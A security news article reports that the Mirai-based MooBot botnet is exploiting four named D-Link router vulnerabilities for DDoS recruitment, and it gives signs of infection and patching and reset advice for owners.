The Mirai malware botnet variant known as ‘MooBot’ has re-emerged in a new attack wave that started early last month, targeting vulnerable D-Link routers with a mix of old and new exploits. MooBot was discovered by analysts at Fortinet in December 2021, targeting a flaw in Hikvision cameras to spread quickly and enlist many devices into its DDoS (distributed denial of service) army. Today, the malware has refreshed its targeting scope, which is typical for botnets looking for untapped pools of vulnerable devices they can ensnare. According to a report compiled by Palo Alto Network’s Unit 42 researchers, MooBot is now targeting the following critical vulnerabilities in D-Link devices:
- CVE-2015-2051: D-Link HNAP SOAPAction Header Command Execution Vulnerability
- CVE-2018-6530: D-Link SOAP Interface Remote Code Execution Vulnerability
- CVE-2022-26258: D-Link Remote Command Execution Vulnerability
- CVE-2022-28958: D-Link Remote Command Execution Vulnerability
The vendor has released security updates to address these flaws, but not all users have applied the patches yet, especially the last two, which became known in March and May this year. MooBot’s operators leverage the low-attack complexity of the flaws to gain remote code execution on the targets and fetch the malware binary using arbitrary commands. After the malware decodes the hardcoded address from the configuration, the newly captured routers are registered on the threat actor’s C2. Eventually, the captured routers participate in directed DDoS attacks against various targets; typically, the threat actors sell DDoS services to anyone interested in causing downtimes or disruption to sites and online services.
Users of compromised D-Link devices may notice internet speed drops, unresponsiveness, router overheating, or inexplicable DNS configuration changes, all common signs of botnet infections. The best way to shut the door to MooBot is to apply the available firmware updates on all D-Link routers. Older, unsupported devices should be configures to prevent remote access to the admin panel. If the D-link device has been compromised already, adminstrators should perform a reset from the corresponding physical button, change the admin password, and then install the latest security updates from the vendor. It’s important to note that the C2 addresses presented in Unit 42’s report differ from those in Fortinet’s write-up, indicating a refresh in the threat actor’s infrastructure.